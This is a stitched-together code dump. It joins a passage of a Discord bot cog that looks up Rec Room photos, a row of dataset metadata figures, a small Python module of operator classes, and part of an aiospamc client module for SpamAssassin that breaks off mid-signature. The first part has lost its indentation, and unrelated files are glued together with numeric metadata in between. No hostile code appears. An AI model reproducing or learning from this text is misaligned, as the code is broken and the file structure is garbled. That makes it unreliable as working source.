comments = 0
together_images = functions.together(user1_account['account_id'], user2_account['account_id'])
for post in together_images:
photos_found.append(post['Id'])
msg += f"<https://rec.net/image/{post['Id']}>\n"
cheers += post['CheerCount']
comments += post['CommentCount']
save_msg += f"https://rec.net/image/{post['Id']}\n"
save_msg += f"Date: {post['CreatedAt'][:10]} {post['CreatedAt'][11:16]} UTC\n"
save_msg += f"Cheers: {post['CheerCount']}\n"
save_msg += f"Comments: {post['CommentCount']}\n"
save_msg += "\n"
if photos_found:
if len(msg) > 1500:
exceeded_limit = True
# message exceeded
msg = "*Message exceeded Discord's message length limit.*\n\n"
with open("temp_txt.txt","w") as text_file:
text_file.write(save_msg)
file_name = f"Together ^{user1_account['username']} and {user2_account['username']}.txt"
# first pic
msg += f"\n**First picture:** https://rec.net/image/{photos_found[len(photos_found)-1]}\n"
# latest picture
msg += f"**Latest picture:** https://rec.net/image/{photos_found[0]}\n\n"
# cheers
msg += f"<:CheerGeneral:803244099510861885> `{cheers}` *(CHEERS IN TOTAL)*\n"
# comments
msg += f"💬 `{comments}` *(COMMENTS IN TOTAL)*\n\n"
# results
msg += f"*Results:* `{len(photos_found)}`"
if exceeded_limit:
print("SEND")
with open("temp_txt.txt","rb") as text_file:
await ctx.send(f"{author}\n{msg}",file=discord.File(text_file, file_name))
reset_txt("temp_txt.txt")
else:
print("what")
await ctx.send(f"{author}\n{msg}")
else: # not found
embed = functions.error_msg(ctx, f"Couldn't find any post that features both `@{user1_account['username']}` and `@{user2_account['username']}`!")
await ctx.send(embed=embed)
else:
embed = functions.error_msg(ctx, f"Couldn't find any post that features both `@{user1_account['username']}` and `@{user2_account['username']}`!")
await ctx.send(embed=embed)
else: # either doesn't exist
embed = functions.error_msg(ctx, f"Either `@{user1}` or `@{user2}` don't exist!")
await ctx.send(embed=embed)
@ltogether.error
async def clear_error(self, ctx, error):
await functions.report_error(ctx, error, self.client.get_channel(functions.error_channel))
if isinstance(error, commands.MissingRequiredArgument):
embed = functions.error_msg(ctx, "Please include in 2 users! Usage: `.ltogether <user1> <user2>`")
await ctx.send(embed=embed)
else:
pass
# CMD-TAKENIN
@commands.command()
@commands.check(functions.beta_tester)
async def ltakenin(self, ctx, room, profile):
functions.log(ctx.guild.name, ctx.author, ctx.command)
author = f"<@{ctx.author.id}>"
room_data = functions.get_room_json(room)
if room_data: #if room exists
account = functions.check_account_existence_and_return(profile)
if account: # if account exists
photos = functions.id_to_photos(account['account_id'])
if photos: # if user has posted anything
msg = ""
save_msg = ""
photos_found = []
exceeded_limit = False
cheers = 0
comments = 0
for post in photos:
if post['RoomId'] == room_data['RoomId']:
photos_found.append(post['Id'])
msg += f"<https://rec.net/image/{post['Id']}>\n"
cheers += post['CheerCount']
comments += post['CommentCount']
save_msg += f"https://rec.net/image/{post['Id']}\n"
save_msg += f"Date: {post['CreatedAt'][:10]} {post['CreatedAt'][11:16]} UTC\n"
save_msg += f"Cheers: {post['CheerCount']}\n"
save_msg += f"Comments: {post['CommentCount']}\n"
save_msg += "\n"
if photos_found:
if len(msg) > 1500:
exceeded_limit = True
# message exceeded
msg = "*Message exceeded Discord's message length limit.*\n\n"
with open("temp_txt.txt","w") as text_file:
text_file.write(save_msg)
reset_txt("temp_txt.txt")
file_name = f"Taken in ^{room_data['Name']}, by {account['username']}.txt"
# first pic
msg += f"\n**First picture in **`^{room_data['Name']}`: https://rec.net/image/{photos_found[len(photos_found)-1]}\n"
# latest picture
msg += f"**Latest picture in **`^{room_data['Name']}`: https://rec.net/image/{photos_found[0]}\n\n"
# cheers
msg += f"**Cheers in total:** `{cheers}`\n"
# comments
msg += f"**Comments in total:** `{comments}`\n\n"
# results
msg += f"*Results:* `{len(photos_found)}`"
if exceeded_limit:
print("SEND")
with open("temp_txt.txt","rb") as text_file:
await ctx.send(f"{author}\n{msg}",file=discord.File(text_file, file_name))
else:
print("what")
await ctx.send(f"{author}\n{msg}")
else: # not found
embed = functions.error_msg(ctx, f"User `@{account['username']}` hasn't shared a single picture in `^{room_data['Name']}`!")
await ctx.send(embed=embed)
else:
embed = functions.error_msg(ctx, f"User `@{account['username']}` hasn't shared a single picture!")
await ctx.send(embed=embed)
else:
embed = functions.error_msg(ctx, f"User `@{profile}` doesn't exist!")
await ctx.send(embed=embed)
else: # room doesn't exist
embed = functions.error_msg(ctx, f"Room `{room}` doesn't exist!")
await ctx.send(embed=embed)
@ltakenin.error
async def clear_error(self, ctx, error):
await functions.report_error(ctx, error, self.client.get_channel(functions.error_channel))
if isinstance(error, commands.MissingRequiredArgument):
embed = functions.error_msg(ctx, "Please include in a room and an user! Usage: `.ltakenin <room> <user>`")
await ctx.send(embed=embed)
else:
pass
# CMD-TAKENOF
@commands.command()
@commands.check(functions.beta_tester)
async def ltakenof(self, ctx, of_user, by_user):
functions.log(ctx.guild.name, ctx.author, ctx.command)
author = f"<@{ctx.author.id}>"
of_user_account = functions.check_account_existence_and_return(of_user)
by_user_account = functions.check_account_existence_and_return(by_user)
if of_user_account and by_user_account: #if both exist
of_user_feed = functions.id_to_feed(of_user_account['account_id'])
if of_user_feed: # if user appears anywhere
msg = ""
save_msg = ""
photos_found = []
exceeded_limit = False
cheers = 0
comments = 0
for post in of_user_feed:
if by_user_account['account_id'] == post['PlayerId']:
photos_found.append(post['Id'])
msg += f"<https://rec.net/image/{post['Id']}>\n"
cheers += post['CheerCount']
comments += post['CommentCount']
save_msg += f"https://rec.net/image/{post['Id']}\n"
save_msg += f"Date: {post['CreatedAt'][:10]} {post['CreatedAt'][11:16]} UTC\n"
save_msg += f"Cheers: {post['CheerCount']}\n"
save_msg += f"Comments: {post['CommentCount']}\n"
save_msg += "\n"
if photos_found:
if len(msg) > 1500:
exceeded_limit = True
# message exceeded
msg = "*Message exceeded Discord's message length limit.*\n\n"
with open("temp_txt.txt","w") as text_file:
text_file.write(save_msg)
file_name = f"Taken of ^{of_user_account['username']}, by {by_user_account['username']}.txt"
# first pic
msg += f"\n**First picture:** https://rec.net/image/{photos_found[len(photos_found)-1]}\n"
# latest picture
msg += f"**Latest picture:** https://rec.net/image/{photos_found[0]}\n\n"
# cheers
msg += f"**Cheers in total:** `{cheers}`\n"
# comments
msg += f"**Comments in total:** `{comments}`\n\n"
# results
msg += f"*Results:* `{len(photos_found)}`"
if exceeded_limit:
print("SEND")
with open("temp_txt.txt","rb") as text_file:
await ctx.send(f"{author}\n{msg}",file=discord.File(text_file, file_name))
reset_txt("temp_txt.txt")
else:
print("what")
await ctx.send(f"{author}\n{msg}")
else: # not found
embed = functions.error_msg(ctx, f"Couldn't find any picture taken by `@{by_user_account['username']}`, that features `@{of_user_account['username']}`")
await ctx.send(embed=embed)
else:
embed = functions.error_msg(ctx, f"User `@{of_user_account['username']}` isn't tagged in any post!")
await ctx.send(embed=embed)
else: # either doesn't exist
embed = functions.error_msg(ctx, f"Either `@{of_user}` or `@{by_user}` don't exist!")
await ctx.send(embed=embed)
@ltakenof.error
async def clear_error(self, ctx, error):
await functions.report_error(ctx, error, self.client.get_channel(functions.error_channel))
if isinstance(error, commands.MissingRequiredArgument):
embed = functions.error_msg(ctx, "Please include in 2 users! Usage: `.ltakenof <of_user> <by_user>`")
await ctx.send(embed=embed)
else:
pass
# CMD-TAKENOFIN
@commands.command(aliases=['ltoi'])
@commands.check(functions.beta_tester)
async def ltakenofin(self, ctx, of_user, room):
functions.log(ctx.guild.name, ctx.author, ctx.command)
author = f"<@{ctx.author.id}>"
of_user_account = functions.check_account_existence_and_return(of_user)
room_data = functions.get_room_json(room)
if of_user_account:#if both exist
if room_data:
of_user_feed = functions.id_to_feed(of_user_account['account_id'])
if of_user_feed: # if user appears anywhere
msg = ""
save_msg = ""
photos_found = []
exceeded_limit = False
cheers = 0
comments = 0
for post in of_user_feed:
if room_data['RoomId'] == post['RoomId']:
photos_found.append(post['Id'])
msg += f"<https://rec.net/image/{post['Id']}>\n"
cheers += post['CheerCount']
comments += post['CommentCount']
save_msg += f"https://rec.net/image/{post['Id']}\n"
save_msg += f"Date: {post['CreatedAt'][:10]} {post['CreatedAt'][11:16]} UTC\n"
save_msg += f"Cheers: {post['CheerCount']}\n"
save_msg += f"Comments: {post['CommentCount']}\n"
save_msg += "\n"
if photos_found:
if len(msg) > 1500:
exceeded_limit = True
# message exceeded
msg = "*Message exceeded Discord's message length limit.*\n\n"
with open("temp_txt.txt","w") as text_file:
text_file.write(save_msg)
file_name = f"Taken of @{of_user_account['username']}, in ^{room_data['Name']}.txt"
# first pic
msg += f"\n**First picture:** https://rec.net/image/{photos_found[len(photos_found)-1]}\n"
# latest picture
msg += f"**Latest picture:** https://rec.net/image/{photos_found[0]}\n\n"
# cheers
msg += f"**Cheers in total:** `{cheers}`\n"
# comments
msg += f"**Comments in total:** `{comments}`\n\n"
# results
msg += f"*Results:* `{len(photos_found)}`"
if exceeded_limit:
print("SEND")
with open("temp_txt.txt","rb") as text_file:
await ctx.send(f"{author}\n{msg}",file=discord.File(text_file, file_name))
reset_txt("temp_txt.txt")
else:
print("what")
await ctx.send(f"{author}\n{msg}")
else: # not found
embed = functions.error_msg(ctx, f"Couldn't find any picture taken of `@{of_user_account['username']}` in `^{room_data['Name']}`!")
await ctx.send(embed=embed)
else:
embed = functions.error_msg(ctx, f"Room `^{room}` doesn't exist!")
await ctx.send(embed=embed)
else: # either doesn't exist
embed = functions.error_msg(ctx, f"User `@{of_user}` doesn't exist!")
await ctx.send(embed=embed)
@ltakenofin.error
async def clear_error(self, ctx, error):
await functions.report_error(ctx, error, self.client.get_channel(functions.error_channel))
if isinstance(error, commands.MissingRequiredArgument):
embed = functions.error_msg(ctx, "Please include in an user and a room! Usage: `.ltakenofin <user> <room>`")
await ctx.send(embed=embed)
else:
pass
# CMD-FRONTPAGE
@commands.command()
@commands.check(functions.beta_tester)
async def lfrontpage(self, ctx):
functions.log(ctx.guild.name, ctx.author, ctx.command)
msg = ""
frontpage = functions.get_frontpage(5)
for post in frontpage:
tagged = ""
if post['TaggedPlayerIds']:
tagged = "👥 "
for account_id in post['TaggedPlayerIds']:
tagged += f"`@{functions.id_to_username(account_id)}` "
else: tagged = "👥 None!"
msg += f"https://rec.net/image/{post['Id']}\n**{functions.id_to_display_name(post['PlayerId'])}** @{functions.id_to_username(post['PlayerId'])}\n🚪 `^{functions.id_to_room_name(post['RoomId'])}`\n<:CheerGeneral:803244099510861885> `{post['CheerCount']}`\n💬 `{post['CommentCount']}`\n{tagged}\n\n"
await ctx.send(msg)
def setup(client):
client.add_cog(Legacy(client))
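# The lsortby, ltogether, ltakenin, ltakenof and ltakenofin commands all repeat the same
# fallback: when the accumulated message would exceed Discord's length limit, dump the
# details to temp_txt.txt and attach it. A minimal sketch of one way that fallback could
# be factored out is shown below; send_long_message is a hypothetical helper, not part
# of the existing cog, and the caller is still responsible for building the short
# summary text used when the limit is exceeded.
async def send_long_message(ctx, author, msg, save_msg, file_name, exceeded_limit):
    """Send the message directly, or attach the full details as a text file when the
    Discord length limit was exceeded, mirroring the inline logic above."""
    if not exceeded_limit:
        await ctx.send(f"{author}\n{msg}")
        return
    with open("temp_txt.txt", "w") as text_file:
        text_file.write(save_msg)
    with open("temp_txt.txt", "rb") as text_file:
        await ctx.send(f"{author}\n{msg}", file=discord.File(text_file, file_name))
    reset_txt("temp_txt.txt")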
| 46.675497
| 307
| 0.496595
| 2,263
| 21,144
| 4.493151
| 0.083076
| 0.017703
| 0.034225
| 0.045437
| 0.807435
| 0.783832
| 0.773997
| 0.755901
| 0.717152
| 0.660995
| 0
| 0.009467
| 0.380533
| 21,144
| 452
| 308
| 46.778761
| 0.766453
| 0.03339
| 0
| 0.731214
| 0
| 0.034682
| 0.253201
| 0.079021
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008671
| false
| 0.014451
| 0.011561
| 0
| 0.023121
| 0.026012
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
45946d4db2328fce583081f30c6987076b0e96e2
| 1,772
|
py
|
Python
|
tools37/tkfw/python/operators.py
|
GabrielAmare/Tools37
|
5f2fe5a9b303a52442d0b808d39a1ae1c501a49d
|
[
"MIT"
] | null | null | null |
tools37/tkfw/python/operators.py
|
GabrielAmare/Tools37
|
5f2fe5a9b303a52442d0b808d39a1ae1c501a49d
|
[
"MIT"
] | null | null | null |
tools37/tkfw/python/operators.py
|
GabrielAmare/Tools37
|
5f2fe5a9b303a52442d0b808d39a1ae1c501a49d
|
[
"MIT"
] | null | null | null |
from .base import UnaryOperator, BinaryOperator
__all__ = [
'Neg',
'BitwiseNot',
'Not',
'Add',
'Sub',
'Mul',
'TrueDiv',
'Mod',
'Pow',
'FloorDiv',
'BitwiseAnd',
'BitwiseOr',
'BitwiseXor',
'And',
'Or'
]
class Neg(UnaryOperator):
def __str__(self):
return f"-{self.right!s}"
class BitwiseNot(UnaryOperator):
def __str__(self):
return f"~{self.right!s}"
class Not(UnaryOperator):
def __str__(self):
return f"not {self.right!s}"
class Add(BinaryOperator):
def __str__(self):
return f"{self.left!s} + {self.right!s}"
class Sub(BinaryOperator):
def __str__(self):
return f"{self.left!s} - {self.right!s}"
class Mul(BinaryOperator):
def __str__(self):
return f"{self.left!s} * {self.right!s}"
class TrueDiv(BinaryOperator):
def __str__(self):
return f"{self.left!s} / {self.right!s}"
class Mod(BinaryOperator):
def __str__(self):
return f"{self.left!s} % {self.right!s}"
class Pow(BinaryOperator):
def __str__(self):
return f"{self.left!s} ** {self.right!s}"
class FloorDiv(BinaryOperator):
def __str__(self):
return f"{self.left!s} // {self.right!s}"
class BitwiseAnd(BinaryOperator):
def __str__(self):
return f"{self.left!s} & {self.right!s}"
class BitwiseOr(BinaryOperator):
def __str__(self):
return f"{self.left!s} | {self.right!s}"
class BitwiseXor(BinaryOperator):
def __str__(self):
return f"{self.left!s} ^ {self.right!s}"
class And(BinaryOperator):
def __str__(self):
return f"{self.left!s} and {self.right!s}"
class Or(BinaryOperator):
def __str__(self):
return f"{self.left!s} or {self.right!s}"
| 18.652632
| 50
| 0.604402
| 225
| 1,772
| 4.475556
| 0.133333
| 0.089374
| 0.148957
| 0.238332
| 0.744786
| 0.744786
| 0.714995
| 0.714995
| 0.714995
| 0.635551
| 0
| 0
| 0.231377
| 1,772
| 94
| 51
| 18.851064
| 0.739354
| 0
| 0
| 0.238095
| 0
| 0
| 0.278217
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.238095
| false
| 0
| 0.015873
| 0.238095
| 0.730159
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 8
|
45cbeeca0eaee023c872f93da9be34473803c4a5
| 26,209
|
py
|
Python
|
aiospamc/frontend.py
|
mjcaley/spamc
|
67c4f2b13d569238ea24794eb5253a1416226a2a
|
[
"MIT"
] | null | null | null |
aiospamc/frontend.py
|
mjcaley/spamc
|
67c4f2b13d569238ea24794eb5253a1416226a2a
|
[
"MIT"
] | null | null | null |
aiospamc/frontend.py
|
mjcaley/spamc
|
67c4f2b13d569238ea24794eb5253a1416226a2a
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
"""Frontend functions for the package."""
from typing import (
Any,
Dict,
Optional,
SupportsBytes,
Union,
)
from loguru import logger
from .client import Client
from .connections import Timeout
from .header_values import MessageClassValue
from .options import ActionOption, MessageClassOption
from .incremental_parser import parse_set_remove_value
from .responses import Response
from .requests import Request
async def check(
message: Union[bytes, SupportsBytes],
*,
host: str = "localhost",
port: int = 783,
socket_path: str = None,
timeout: Timeout = None,
verify: Optional[Any] = None,
user: str = None,
compress: bool = False,
**kwargs,
) -> Response:
"""Checks a message if it's spam and return a response with a score header.
:param message: Copy of the message.
:param host: Hostname or IP address of the SPAMD service, defaults to localhost.
:param port: Port number for the SPAMD service, defaults to 783.
:param socket_path: Path to Unix socket.
:param timeout: Timeout settings.
:param verify:
Enable SSL. `True` will use the root certificates from the :py:mod:`certifi` package.
`False` will use SSL, but not verify the root certificates. Passing a path to a
certificate file will use it to verify the root certificates.
:param user: Username to pass to the SPAMD service.
:param compress: Enable compression of the request body.
:return:
A successful response with a "Spam" header showing if the message is
considered spam as well as the score.
:raises BadResponse: If the response from SPAMD is ill-formed this exception will be raised.
:raises AIOSpamcConnectionFailed: Raised if an error occurred when trying to connect.
:raises UsageException: Error in command line usage.
:raises DataErrorException: Error with data format.
:raises NoInputException: Cannot open input.
:raises NoUserException: Addressee unknown.
:raises NoHostException: Hostname unknown.
:raises UnavailableException: Service unavailable.
:raises InternalSoftwareException: Internal software error.
:raises OSErrorException: System error.
:raises OSFileException: Operating system file missing.
:raises CantCreateException: Cannot create output file.
:raises IOErrorException: Input/output error.
:raises TemporaryFailureException: Temporary failure, may reattempt.
:raises ProtocolException: Error in the protocol.
:raises NoPermissionException: Permission denied.
:raises ConfigException: Error in configuration.
:raises ServerTimeoutException: Server responded that it timed out.
:raises ClientTimeoutException: Client timed out during connection.
"""
client = kwargs.get("client", Client())
req = Request("CHECK", body=bytes(message))
context_logger = logger.bind(
host=host,
port=port,
socket_path=socket_path,
user=user,
request=req,
)
context_logger.info("Sending CHECK request")
try:
response = await client.request(
req,
host=host,
port=port,
socket_path=socket_path,
timeout=timeout,
verify=verify,
user=user,
compress=compress,
)
except Exception:
context_logger.exception("Exception when calling check function")
raise
context_logger.bind(response=response).success(
"Successfully completed check function"
)
return response
async def headers(
message: Union[bytes, SupportsBytes],
*,
host: str = "localhost",
port: int = 783,
socket_path: str = None,
timeout: Timeout = None,
verify: Optional[Any] = None,
user: str = None,
compress: bool = False,
**kwargs,
) -> Response:
"""Checks a message if it's spam and return the modified message headers.
:param message: Copy of the message.
:param host: Hostname or IP address of the SPAMD service, defaults to localhost.
:param port: Port number for the SPAMD service, defaults to 783.
:param socket_path: Path to Unix socket.
:param timeout: Timeout settings.
:param verify:
Enable SSL. `True` will use the root certificates from the :py:mod:`certifi` package.
`False` will use SSL, but not verify the root certificates. Passing a path to a
certificate file will use it to verify the root certificates.
:param user: Username to pass to the SPAMD service.
:param compress: Enable compression of the request body.
:return:
A successful response with a "Spam" header showing if the message is
considered spam as well as the score. The body contains the modified
message headers, but not the content of the message.
:raises BadResponse: If the response from SPAMD is ill-formed this exception will be raised.
:raises AIOSpamcConnectionFailed: Raised if an error occurred when trying to connect.
:raises UsageException: Error in command line usage.
:raises DataErrorException: Error with data format.
:raises NoInputException: Cannot open input.
:raises NoUserException: Addressee unknown.
:raises NoHostException: Hostname unknown.
:raises UnavailableException: Service unavailable.
:raises InternalSoftwareException: Internal software error.
:raises OSErrorException: System error.
:raises OSFileException: Operating system file missing.
:raises CantCreateException: Cannot create output file.
:raises IOErrorException: Input/output error.
:raises TemporaryFailureException: Temporary failure, may reattempt.
:raises ProtocolException: Error in the protocol.
:raises NoPermissionException: Permission denied.
:raises ConfigException: Error in configuration.
:raises ServerTimeoutException: Server responded that it timed out.
:raises ClientTimeoutException: Client timed out during connection.
"""
client = kwargs.get("client", Client())
req = Request("HEADERS", body=bytes(message))
context_logger = logger.bind(
host=host,
port=port,
socket_path=socket_path,
user=user,
request=req,
)
context_logger.info("Sending HEADERS request")
try:
response = await client.request(
req,
host=host,
port=port,
socket_path=socket_path,
timeout=timeout,
verify=verify,
user=user,
compress=compress,
)
except Exception:
context_logger.exception("Exception when calling headers function")
raise
context_logger.bind(response=response).success(
"Successfully completed headers function"
)
return response
async def ping(
*,
host: str = "localhost",
port: int = 783,
socket_path: str = None,
timeout: Timeout = None,
verify: Optional[Any] = None,
**kwargs,
) -> Response:
"""Sends a ping to the SPAMD service.
:param host: Hostname or IP address of the SPAMD service, defaults to localhost.
:param port: Port number for the SPAMD service, defaults to 783.
:param socket_path: Path to Unix socket.
:param timeout: Timeout settings.
:param verify:
Enable SSL. `True` will use the root certificates from the :py:mod:`certifi` package.
`False` will use SSL, but not verify the root certificates. Passing a path to a
certificate file will use it to verify the root certificates.
:return: A response with "PONG".
:raises BadResponse: If the response from SPAMD is ill-formed this exception will be raised.
:raises AIOSpamcConnectionFailed: Raised if an error occurred when trying to connect.
:raises UsageException: Error in command line usage.
:raises DataErrorException: Error with data format.
:raises NoInputException: Cannot open input.
:raises NoUserException: Addressee unknown.
:raises NoHostException: Hostname unknown.
:raises UnavailableException: Service unavailable.
:raises InternalSoftwareException: Internal software error.
:raises OSErrorException: System error.
:raises OSFileException: Operating system file missing.
:raises CantCreateException: Cannot create output file.
:raises IOErrorException: Input/output error.
:raises TemporaryFailureException: Temporary failure, may reattempt.
:raises ProtocolException: Error in the protocol.
:raises NoPermissionException: Permission denied.
:raises ConfigException: Error in configuration.
:raises ServerTimeoutException: Server responded that it timed out.
:raises ClientTimeoutException: Client timed out during connection.
"""
client = kwargs.get("client", Client())
req = Request("PING")
context_logger = logger.bind(
host=host,
port=port,
socket_path=socket_path,
request=req,
)
context_logger.info("Sending PING request")
try:
response = await client.request(
req,
host=host,
port=port,
socket_path=socket_path,
timeout=timeout,
verify=verify,
)
except Exception:
context_logger.exception("Exception when calling ping function")
raise
context_logger.bind(response=response).success(
"Successfully completed ping function"
)
return response
async def process(
message: Union[bytes, SupportsBytes],
*,
host: str = "localhost",
port: int = 783,
socket_path: str = None,
timeout: Timeout = None,
verify: Optional[Any] = None,
user: str = None,
compress: bool = False,
**kwargs,
) -> Response:
"""Checks a message if it's spam and return a response with a score header.
:param message: Copy of the message.
:param host: Hostname or IP address of the SPAMD service, defaults to localhost.
:param port: Port number for the SPAMD service, defaults to 783.
:param socket_path: Path to Unix socket.
:param timeout: Timeout settings.
:param verify:
Enable SSL. `True` will use the root certificates from the :py:mod:`certifi` package.
`False` will use SSL, but not verify the root certificates. Passing a path to a
certificate file will use it to verify the root certificates.
:param user: Username to pass to the SPAMD service.
:param compress: Enable compression of the request body.
:return:
A successful response with a "Spam" header showing if the message is
considered spam as well as the score. The body contains a modified
copy of the message.
:raises BadResponse: If the response from SPAMD is ill-formed this exception will be raised.
:raises AIOSpamcConnectionFailed: Raised if an error occurred when trying to connect.
:raises UsageException: Error in command line usage.
:raises DataErrorException: Error with data format.
:raises NoInputException: Cannot open input.
:raises NoUserException: Addressee unknown.
:raises NoHostException: Hostname unknown.
:raises UnavailableException: Service unavailable.
:raises InternalSoftwareException: Internal software error.
:raises OSErrorException: System error.
:raises OSFileException: Operating system file missing.
:raises CantCreateException: Cannot create output file.
:raises IOErrorException: Input/output error.
:raises TemporaryFailureException: Temporary failure, may reattempt.
:raises ProtocolException: Error in the protocol.
:raises NoPermissionException: Permission denied.
:raises ConfigException: Error in configuration.
:raises ServerTimeoutException: Server responded that it timed out.
:raises ClientTimeoutException: Client timed out during connection.
"""
client = kwargs.get("client", Client())
req = Request("PROCESS", body=bytes(message))
context_logger = logger.bind(
host=host,
port=port,
socket_path=socket_path,
user=user,
request=req,
)
context_logger.info("Sending PROCESS request")
try:
response = await client.request(
req,
host=host,
port=port,
socket_path=socket_path,
timeout=timeout,
verify=verify,
user=user,
compress=compress,
)
except Exception:
context_logger.exception("Exception when calling process function")
raise
context_logger.bind(response=response).success(
"Successfully completed process function"
)
return response
async def report(
message: Union[bytes, SupportsBytes],
*,
host: str = "localhost",
port: int = 783,
socket_path: str = None,
timeout: Timeout = None,
verify: Optional[Any] = None,
user: str = None,
compress: bool = False,
**kwargs,
) -> Response:
"""Checks a message if it's spam and return a response with a score header.
:param message: Copy of the message.
:param host: Hostname or IP address of the SPAMD service, defaults to localhost.
:param port: Port number for the SPAMD service, defaults to 783.
:param socket_path: Path to Unix socket.
:param timeout: Timeout settings.
:param verify:
Enable SSL. `True` will use the root certificates from the :py:mod:`certifi` package.
`False` will use SSL, but not verify the root certificates. Passing a path to a
certificate file will use it to verify the root certificates.
:param user: Username to pass to the SPAMD service.
:param compress: Enable compression of the request body.
:return:
A successful response with a "Spam" header showing if the message is
considered spam as well as the score. The body contains a report.
:raises BadResponse: If the response from SPAMD is ill-formed this exception will be raised.
:raises AIOSpamcConnectionFailed: Raised if an error occurred when trying to connect.
:raises UsageException: Error in command line usage.
:raises DataErrorException: Error with data format.
:raises NoInputException: Cannot open input.
:raises NoUserException: Addressee unknown.
:raises NoHostException: Hostname unknown.
:raises UnavailableException: Service unavailable.
:raises InternalSoftwareException: Internal software error.
:raises OSErrorException: System error.
:raises OSFileException: Operating system file missing.
:raises CantCreateException: Cannot create output file.
:raises IOErrorException: Input/output error.
:raises TemporaryFailureException: Temporary failure, may reattempt.
:raises ProtocolException: Error in the protocol.
:raises NoPermissionException: Permission denied.
:raises ConfigException: Error in configuration.
:raises ServerTimeoutException: Server responded that it timed out.
:raises ClientTimeoutException: Client timed out during connection.
"""
client = kwargs.get("client", Client())
req = Request("REPORT", body=bytes(message))
context_logger = logger.bind(
host=host,
port=port,
socket_path=socket_path,
user=user,
request=req,
)
context_logger.info("Sending REPORT request")
try:
response = await client.request(
req,
host=host,
port=port,
socket_path=socket_path,
timeout=timeout,
verify=verify,
user=user,
compress=compress,
)
except Exception:
context_logger.exception("Exception when calling report function")
raise
context_logger.bind(response=response).success(
"Successfully completed report function"
)
return response
async def report_if_spam(
message: Union[bytes, SupportsBytes],
*,
host: str = "localhost",
port: int = 783,
socket_path: str = None,
timeout: Timeout = None,
verify: Optional[Any] = None,
user: str = None,
compress: bool = False,
**kwargs,
) -> Response:
"""Checks a message if it's spam and return a response with a score header.
:param message: Copy of the message.
:param host: Hostname or IP address of the SPAMD service, defaults to localhost.
:param port: Port number for the SPAMD service, defaults to 783.
:param socket_path: Path to Unix socket.
:param timeout: Timeout settings.
:param verify:
Enable SSL. `True` will use the root certificates from the :py:mod:`certifi` package.
`False` will use SSL, but not verify the root certificates. Passing a path to a
certificate file will use it to verify the root certificates.
:param user: Username to pass to the SPAMD service.
:param compress: Enable compression of the request body.
:return:
A successful response with a "Spam" header showing if the message is
considered spam as well as the score. The body contains a report if
the message is considered spam.
:raises BadResponse: If the response from SPAMD is ill-formed this exception will be raised.
:raises AIOSpamcConnectionFailed: Raised if an error occurred when trying to connect.
:raises UsageException: Error in command line usage.
:raises DataErrorException: Error with data format.
:raises NoInputException: Cannot open input.
:raises NoUserException: Addressee unknown.
:raises NoHostException: Hostname unknown.
:raises UnavailableException: Service unavailable.
:raises InternalSoftwareException: Internal software error.
:raises OSErrorException: System error.
:raises OSFileException: Operating system file missing.
:raises CantCreateException: Cannot create output file.
:raises IOErrorException: Input/output error.
:raises TemporaryFailureException: Temporary failure, may reattempt.
:raises ProtocolException: Error in the protocol.
:raises NoPermissionException: Permission denied.
:raises ConfigException: Error in configuration.
:raises ServerTimeoutException: Server responded that it timed out.
:raises ClientTimeoutException: Client timed out during connection.
"""
client = kwargs.get("client", Client())
req = Request("REPORT_IFSPAM", body=bytes(message))
context_logger = logger.bind(
host=host,
port=port,
socket_path=socket_path,
user=user,
request=req,
)
context_logger.info("Sending REPORT_IFSPAM request")
try:
response = await client.request(
req,
host=host,
port=port,
socket_path=socket_path,
timeout=timeout,
verify=verify,
user=user,
compress=compress,
)
except Exception:
context_logger.exception("Exception when calling report_if_spam function")
raise
context_logger.bind(response=response).success(
"Successfully completed report_if_spam function"
)
return response
async def symbols(
message: Union[bytes, SupportsBytes],
*,
host: str = "localhost",
port: int = 783,
socket_path: str = None,
timeout: Timeout = None,
verify: Optional[Any] = None,
user: str = None,
compress: bool = False,
**kwargs,
) -> Response:
"""Checks a message if it's spam and return a response with rules that matched.
:param message: Copy of the message.
:param host: Hostname or IP address of the SPAMD service, defaults to localhost.
:param port: Port number for the SPAMD service, defaults to 783.
:param socket_path: Path to Unix socket.
:param timeout: Timeout settings.
:param verify:
Enable SSL. `True` will use the root certificates from the :py:mod:`certifi` package.
`False` will use SSL, but not verify the root certificates. Passing a path to a
certificate file will use it to verify the root certificates.
:param user: Username to pass to the SPAMD service.
:param compress: Enable compression of the request body.
:return:
A successful response with a "Spam" header showing if the message is
considered spam as well as the score. The body contains a
comma-separated list of the symbols that were hit.
:raises BadResponse: If the response from SPAMD is ill-formed this exception will be raised.
:raises AIOSpamcConnectionFailed: Raised if an error occurred when trying to connect.
:raises UsageException: Error in command line usage.
:raises DataErrorException: Error with data format.
:raises NoInputException: Cannot open input.
:raises NoUserException: Addressee unknown.
:raises NoHostException: Hostname unknown.
:raises UnavailableException: Service unavailable.
:raises InternalSoftwareException: Internal software error.
:raises OSErrorException: System error.
:raises OSFileException: Operating system file missing.
:raises CantCreateException: Cannot create output file.
:raises IOErrorException: Input/output error.
:raises TemporaryFailureException: Temporary failure, may reattempt.
:raises ProtocolException: Error in the protocol.
:raises NoPermissionException: Permission denied.
:raises ConfigException: Error in configuration.
:raises ServerTimeoutException: Server responded that it timed out.
:raises ClientTimeoutException: Client timed out during connection.
"""
client = kwargs.get("client", Client())
req = Request("SYMBOLS", body=bytes(message))
context_logger = logger.bind(
host=host,
port=port,
socket_path=socket_path,
user=user,
request=req,
)
context_logger.info("Sending SYMBOLS request")
try:
response = await client.request(
req,
host=host,
port=port,
socket_path=socket_path,
timeout=timeout,
verify=verify,
user=user,
compress=compress,
)
except Exception:
context_logger.exception("Exception when calling symbols function")
raise
context_logger.bind(response=response).success(
"Successfully completed symbols function"
)
return response
async def tell(
message: Union[bytes, SupportsBytes],
message_class: Union[str, MessageClassOption],
